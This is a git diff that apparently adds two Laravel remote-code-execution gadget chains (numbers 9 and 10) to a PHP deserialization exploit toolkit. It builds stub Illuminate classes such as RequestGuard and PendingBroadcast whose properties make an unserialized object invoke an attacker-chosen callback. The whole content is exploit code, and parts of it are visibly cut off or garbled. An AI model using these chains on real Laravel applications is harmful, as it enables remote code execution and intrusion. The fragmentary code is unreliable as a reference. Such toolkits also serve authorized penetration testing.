diff --git a/gadgetchains/Laravel/RCE/10/chain.php b/gadgetchains/Laravel/RCE/10/chain.php new file mode 100644 index 0000000..3e34888 --- /dev/null +++ b/gadgetchains/Laravel/RCE/10/chain.php @@ -0,0 +1,22 @@ +condition = $condition; + } + } +} + +namespace Illuminate\Auth +{ + class RequestGuard + { + public function __construct($callback, $request, $provider) + { + $this->callback = $callback; + $this->request = $request; + $this->provider = $provider; + } + } +} \ No newline at end of file diff --git a/gadgetchains/Laravel/RCE/9/chain.php b/gadgetchains/Laravel/RCE/9/chain.php new file mode 100644 index 0000000..edf1915 --- /dev/null +++ b/gadgetchains/Laravel/RCE/9/chain.php @@ -0,0 +1,21 @@ +queueResolver = $function; + + } + } +} + +namespace Illuminate\Broadcasting +{ + use Illuminate\Contracts\Queue\ShouldQueue; + + class BroadcastEvent implements ShouldQueue + { + function __construct() + { + + } + } + + class PendingBroadcast + { + protected $events; + protected $event; + + function __construct($dispatcher,$param) + { + $this->event = new BroadcastEvent(); + $this->event->connection = $param; + $this->events = $dispatcher; + } + } +} +